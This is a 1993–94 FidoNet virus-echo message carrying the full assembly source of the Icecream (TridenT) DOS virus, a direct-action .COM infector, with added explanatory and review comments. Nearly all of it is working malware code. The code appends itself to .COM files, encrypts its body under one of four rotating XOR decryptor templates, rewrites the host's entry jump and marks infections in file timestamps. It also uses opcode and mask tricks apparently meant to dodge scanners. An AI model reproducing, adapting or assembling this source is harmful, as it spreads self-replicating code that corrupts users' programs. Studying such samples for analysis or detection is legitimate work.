;─ PVT.VIRII (2:465/65.4) ─────────────────────────────────────────── PVT.VIRII ─
; Msg  : 41 of 54
; From : MeteO                          2:5030/136      Tue 09 Nov 93 09:15
; To   : - *.* -                                        Fri 11 Nov 94 08:10
; Subj : ICECREAM.ASM
;───────────────────────────────────────────────────────────────────────────────
;.RealName: Max Ivanov
;═══════════════════════════════════════════════════════════════════════════════
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: Информация о вирусах — "Information about viruses")
;* From : Dr T, 2:283/718 (06 Nov 94 17:48)
;* To   : Ron Toler
;* Subj : ICECREAM.ASM
;═══════════════════════════════════════════════════════════════════════════════
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f718.n283!not-for-mail
;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org
;
;Icecream virus by the TridenT virus research group.
;
;This is a simple direct-action .COM infector. Each time it runs it appends
;itself to one .COM file in the current directory (files that start with an
;EXE 'MZ'/'ZM' signature are skipped), encrypting its body with a one-byte XOR
;key under one of four decryptor templates so that the appended code varies
;from infection to infection. An infected file is marked by setting the
;seconds field of its DOS time stamp to 1 (= 2 seconds); files already carrying
;that mark are skipped.
;Disassembly by Black Wolf
;-----------------------------------------------------------------------------
; Icecream (TridenT) - direct-action, appending .COM infector for real-mode DOS.
; MASM/TASM syntax, .model tiny (CS = DS = ES = SS), 8086 instructions only.
;
; Image layout (offsets as assembled, i.e. as if the virus sat at 100h; at run
; time bp holds the delta between the assembled and the actual position):
;   100h-102h  3-byte jump into the body.  In a host these bytes are replaced by
;              E9 + JumpSize and the host's originals are kept in Storage.
;   103h-10Eh  12-byte slot for the polymorphic decryptor.  In this first-
;              generation image it holds 'John Tardy' followed by E2 FA.
;   10Fh-2F7h  1E9h bytes of body; XORed with a one-byte key when written.
; The virus written to a host is 1F5h bytes (0Ch decryptor + 1E9h body) and is
; staged in a scratch buffer at 0FA00h; the DTA is moved to 0F900h.  Both are
; plain offsets in the program's own segment, so the code assumes host + virus
; end well below 0F900h and that the rest of the 64K segment is writable.
;
; WARNING: the byte layout is load-bearing.  The hand-encoded jumps (E9 0C 00,
; E9 69 00), the EncData table (2BEh..2D9h), the constants 103h/10Dh/10Fh/1E9h/
; 1F5h and the run-time patching of EncPtrN+1 / EncSizeN+1 all assume the exact
; instruction sizes below.  Changing or re-encoding a single instruction shifts
; them and breaks the result; only comments were added in this revision.
;-----------------------------------------------------------------------------
.model tiny
.code
org 100h

start:
        db      0e9h,0ch,0              ; jmp Virus_Entry, hand-encoded as a 3-byte
                                        ; near jump (E9 rel16) so the decryptor slot
                                        ; below starts exactly at 103h
Author_Name db 'John Tardy'             ; 103h-10Ch: fills the decryptor slot in this
                                        ; first-generation image (see KeyWasZero)
        db      0E2h,0FAh               ; 10Dh-10Eh: loop back to 109h (the xor of a
                                        ; built decryptor).  SetupEncryption flips the
                                        ; opcode E2 <-> E0 (loop <-> loopne) each time
                                        ; a new generation is produced

;-----------------------------------------------------------------------------
; Entry point of the body.  Locates itself, restores the host's first three
; bytes at 100h, then looks for one *.COM to infect and finally jumps to 100h.
;-----------------------------------------------------------------------------
Virus_Entry:
        push    ax                      ; keep the AX the program was started with
        call    Get_Offset              ; pushes the run-time address of Get_Offset
Get_Offset:
        pop     ax
        sub     ax,offset Get_Offset    ; ax = run-time address - assembled address
        db      89h,0c5h                ; mov bp,ax  ->  bp+label = run-time address
                                        ; of label.  Alternate encoding of the same
                                        ; instruction (assemblers emit 8B E8);
                                        ; presumably to defeat a scan string - unverified
        lea     si,[bp+Storage]         ; the host's original first 3 bytes ...
        mov     di,100h                 ; ... go back over the entry point
        movsw
        movsb
        mov     ah,1Ah
        mov     dx,0f900h
        int     21h                     ; Set DTA to 0F900h (inside our own segment)
        mov     ah,4Eh                  ; Find First on the first pass; re-entered
FindFirstNext:                          ; from DoneInfect with ah = 4Fh (Find Next)
        lea     dx,[bp+ComMask]         ; '*.CoM'
        xor     cx,cx                   ; attribute mask 0
        int     21h
        jnc     InfectFile              ; CF clear = a candidate file was found
Restore_DTA:
        mov     ah,1Ah
        mov     dx,80h
        int     21h                     ; Set DTA back to the PSP default at 80h
        mov     bx,offset start
        pop     ax                      ; the AX saved at Virus_Entry
        push    bx
        retn                            ; "jump" to 100h: the restored host bytes

;-----------------------------------------------------------------------------
; Infect the file named in the DTA (file name at DTA+1Eh = 0F91Eh).
; Saved on the stack, in push order: original attributes, time, date.  FinishFile
; consumes them.  Error returns (CF) of open/read/seek/write are never checked:
; a failed open leaves an error code in bx that is then used as the handle.
;-----------------------------------------------------------------------------
InfectFile:
        mov     ax,4300h
        mov     dx,0f91eh               ; file name found by Find First/Next
        int     21h                     ; Get attributes -> cx
        push    cx                      ; kept for FinishFile
        mov     ax,4301h
        xor     cx,cx
        int     21h                     ; Set attributes to 0 (clears read-only etc.)
        mov     ax,3D02h
        int     21h                     ; Open read/write -> ax = handle (dx still = name)
        mov     bx,5700h
        xchg    ax,bx                   ; bx = handle, ax = 5700h
        int     21h                     ; Get file time -> cx = time, dx = date
        push    cx
        push    dx                      ; FinishFile pops these back as dx, cx
        and     cx,1Fh                  ; bits 0-4 of the DOS time = seconds/2
        cmp     cx,1                    ; seconds/2 == 1 is the infection marker
        jne     ContinueInfection
        db      0e9h,69h,0              ; jmp DoneInfect - near jump with a hard-coded
                                        ; displacement (16Ah + 69h = 1D3h = DoneInfect
                                        ; only while every instruction keeps its size)
ContinueInfection:
        mov     ah,3Fh
        lea     dx,[bp+Storage]
        mov     cx,3
        int     21h                     ; Read the host's first 3 bytes into Storage
        mov     ax,cs:[Storage+bp]
        cmp     ax,4D5Ah                ; 'ZM' ...
        je      DoneInfect
        cmp     ax,5A4Dh                ; ... or 'MZ': an EXE renamed to .COM, skip it
        je      DoneInfect
        pop     dx
        pop     cx
        and     cx,0FFE0h               ; seconds/2 := 1 in the saved time word,
        or      cx,1                    ; i.e. mark this file as infected
        push    cx
        push    dx
        mov     ax,4202h                ; seek to end -> dx:ax = file size
        call    Move_FP
        sub     ax,3                    ; displacement from 103h to the appended code;
        mov     cs:[JumpSize+bp],ax     ; becomes the rel16 of the new host jump.
                                        ; NOTE(review): only the low word of the size
                                        ; is used and no upper (or lower) size limit is
                                        ; checked before appending 1F5h bytes
        add     ax,10Fh                 ; size-3+10Fh = 100h+size+0Ch: where the
                                        ; encrypted body sits once loaded, right after
                                        ; the 0Ch-byte decryptor
        mov     word ptr [bp+EncPtr1+1],ax  ; patch the pointer immediate of all four
        mov     word ptr [bp+EncPtr2+1],ax  ; decryptor templates (only one gets used)
        mov     word ptr [bp+EncPtr3+1],ax
        mov     word ptr [bp+EncPtr4+1],ax
        call    SetupEncryption         ; build decryptor + encrypted body at 0FA00h
        mov     ah,40h
        mov     dx,0fa00h
        mov     cx,1F5h                 ; 0Ch decryptor + 1E9h body
        int     21h                     ; Write the virus at the end of the file
        mov     ax,4200h
        call    Move_FP                 ; seek back to offset 0
        mov     ah,40h
        lea     dx,[bp+JumpBytes]
        mov     cx,3
        int     21h                     ; Write E9 + JumpSize over the host's entry
        call    FinishFile              ; marked time stamp, close, attributes
        jmp     Restore_DTA             ; one infection per run, then back to the host
DoneInfect:
        call    FinishFile              ; leave this file exactly as it was found
        mov     ah,4Fh
        jmp     FindFirstNext           ; try the next *.COM

;-----------------------------------------------------------------------------
; Seek on handle bx to offset 0 relative to the origin in al (00 = start,
; 02 = end).  Returns dx:ax = new position.
;-----------------------------------------------------------------------------
Move_FP:
        xor     cx,cx
        xor     dx,dx
        int     21h
        ret

;-----------------------------------------------------------------------------
; Common exit for a candidate file.  Stack on entry (top first): return address,
; saved date, saved time, saved attributes.  The return address is parked in si
; so the pops can reach the saved values; it is pushed back before retn.
;-----------------------------------------------------------------------------
FinishFile:
        pop     si dx cx                ; si = return address, dx = date, cx = time
        mov     ax,5701h
        int     21h                     ; Set file time/date (marked, or unchanged)
        mov     ah,3Eh
        int     21h                     ; Close handle bx
        mov     ax,4301h
        pop     cx                      ; original attributes
        mov     dx,0fc1eh               ; NOTE(review): InfectFile addresses the file
                                        ; name as DTA+1Eh = 0F91Eh; 0FC1Eh lies 300h
                                        ; bytes past it, so as written this Set
                                        ; Attributes call does not point at the name.
                                        ; Transcription error or genuine bug - not
                                        ; verified; its error return is ignored anyway
        int     21h
        push    si
        retn                            ; return to the caller via the parked address

Message db ' I scream, you scream, we both '
        db 'scream for an ice-cream! '  ; text payload; not referenced by any code here

;-----------------------------------------------------------------------------
; Build the image to be written, at 0FA00h:
;   0FA00h-0FA0Bh  a 12-byte decryptor assembled from one of the four templates
;                  at Encryptions plus the E2/E0 FA pair at 10Dh-10Eh
;   0FA0Ch-0FBF4h  the 1E9h body bytes from 10Fh, XORed with a one-byte key
; Randomness comes from the BIOS tick counter at 0000:046Ch:
;   template      = tick & 3
;   decrypt count = 1E9h + (tick & 7FFh): always >= the body length; the excess
;                   XORs the memory following the body in the loaded host
;   key           = low byte of tick (returned in dl; 0 takes the KeyWasZero path)
; The decryptor is assembled in place at 103h, i.e. the running copy's own slot
; becomes the next generation's decryptor, and is then copied to the buffer.
; Assembled decryptor (12 bytes):
;   mov si/di,ptr ; mov cx,count ; xor byte ptr [si/di],key ; inc si/di ;
;   loop/loopne back to the xor
; Clobbers ax, cx, dx, si, di, es (es is set back to cs).
;-----------------------------------------------------------------------------
SetupEncryption:
        xor     byte ptr [bp+10Dh],2    ; flip the decryptor's loop opcode E2 <-> E0
                                        ; (loop <-> loopne).  inc si/di leaves ZF clear
                                        ; unless the pointer wraps to 0, so both forms
                                        ; iterate the same way
        xor     ax,ax
        mov     es,ax
        mov     ax,es:[46ch]            ; BIOS timer tick count as the random source
        push    cs
        pop     es                      ; es = cs again for the string ops below
        push    ax                      ; keep the raw tick value
        and     ax,7FFh
        add     ax,1E9h                 ; decrypt count in [1E9h, 9E8h]
        mov     word ptr [bp+EncSize1+1],ax ; patch the count immediate of all four
        mov     word ptr [bp+EncSize2+1],ax ; templates (done before one is copied)
        mov     word ptr [bp+EncSize3+1],ax
        mov     word ptr [bp+EncSize4+1],ax
        pop     ax
        push    ax
        and     ax,3
        shl     ax,1                    ; (tick & 3) * 2 = word index into EncData1..4
        mov     si,ax
        mov     ax,[bp+si+EncData1]     ; assembled offset of the chosen template
        add     ax,bp
        mov     si,ax                   ; its run-time address
        lea     di,[bp+103h]            ; destination: the decryptor slot
        movsw
        movsw
        movsw
        movsw                           ; 8 bytes: the two movs + 80 34/35 (xor op+modrm)
        pop     ax
        stosb                           ; 10Bh: the xor's imm8 = low byte of tick = key
        movsb                           ; 10Ch: template byte 9 (46h/47h) = inc si/di
        mov     dl,al                   ; dl = key for the loop below
        lea     si,[bp+103h]
        mov     di,0fa00h
        mov     cx,0Ch
        rep     movsb                   ; copy the 12-byte decryptor (103h-10Eh) to buffer
        lea     si,[bp+10Fh]
        mov     cx,1E9h                 ; body length: 10Fh..2F7h
EncryptVirus:
        lodsb
        db      30h,0d0h                ; xor al,dl (hand-encoded)
        stosb
        loop    EncryptVirus
        cmp     dl,0
        je      KeyWasZero
        retn
KeyWasZero:                             ; key 0 = body written in clear.  Overwrite the
                                        ; now pointless decryptor head with the author
                                        ; tag and make the host jump straight to the body
        mov     si,offset AuthorName    ; NOTE(review): no bp delta applied here; correct
                                        ; only in a first-generation run (bp = 0).  In a
                                        ; host this reads whatever sits at that offset
        mov     di,0fa00h
        mov     cx,0Ah
        rep     movsb                   ; 'John Tardy' over the first 10 buffer bytes;
                                        ; the loop opcode pair at +0Ah stays in place
        mov     ax,cs:[JumpSize+bp]
        add     ax,0Ch                  ; skip the 12-byte head - this reproduces the
        mov     cs:[JumpSize+bp],ax     ; E9 0C 00 at the start of this image
        retn

        db      '[TridenT]'             ; group tag, unreferenced
EncData1 dw 02beh                       ; assembled offsets of the four 9-byte templates
EncData2 dw 02c7h                       ; below (2BEh + n*9), indexed by (tick&3)*2 in
EncData3 dw 02d0h                       ; SetupEncryption.  Valid only for the exact
EncData4 dw 02d9h                       ; instruction sizes of this listing
Encryptions:
; Each template is mov ptr / mov count / xor byte ptr [ptr],imm8 (9 bytes).  Only
; the first 8 bytes are copied as-is; the imm8 is replaced by the key and the
; trailing 46h/47h becomes an inc si / inc di.  Templates 3 and 4 swap the order
; of the two movs; the patch sites are addressed by label, so order is free.
;------------------------------------------------------------
EncPtr1:  mov si,0                      ; imm16 patched with the body address
EncSize1: mov cx,0                      ; imm16 patched with the decrypt count
          xor byte ptr [si],46h
;------------------------------------------------------------
EncPtr2:  mov di,0
EncSize2: mov cx,0
          xor byte ptr [di],47h
;------------------------------------------------------------
EncSize3: mov cx,0
EncPtr3:  mov si,0
          xor byte ptr [si],46h
;------------------------------------------------------------
EncSize4: mov cx,0
EncPtr4:  mov di,0
          xor byte ptr [di],47h
;------------------------------------------------------------
AuthorName db 'John Tardy'              ; 0Ah bytes; copied by KeyWasZero
JumpBytes db 0E9h                       ; E9 + JumpSize = the 3-byte jmp written to the
JumpSize dw 0                           ; host's offset 100h
ComMask db '*.CoM',0                    ; Find First mask.  Mixed case; DOS matches names
                                        ; case-insensitively, so presumably only meant
                                        ; to dodge a naive scan string
Storage dw 20CDh                        ; the host's original first 3 bytes.  In this
        db 21h                          ; image: CD 20 = int 20h, so the dropper exits
                                        ; after its one infection; 21h is never reached
end start
;-+- GEcho 1.10+
; + Origin: This virus is Microsoft Windows (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; ■ The MeÂeO
;
;/x Include false conditionals in listing
;
;--- Aidstest Null: /Kill
; * Origin: ·PVT.ViRII·main·board· / Virus Research labs. (2:5030/136)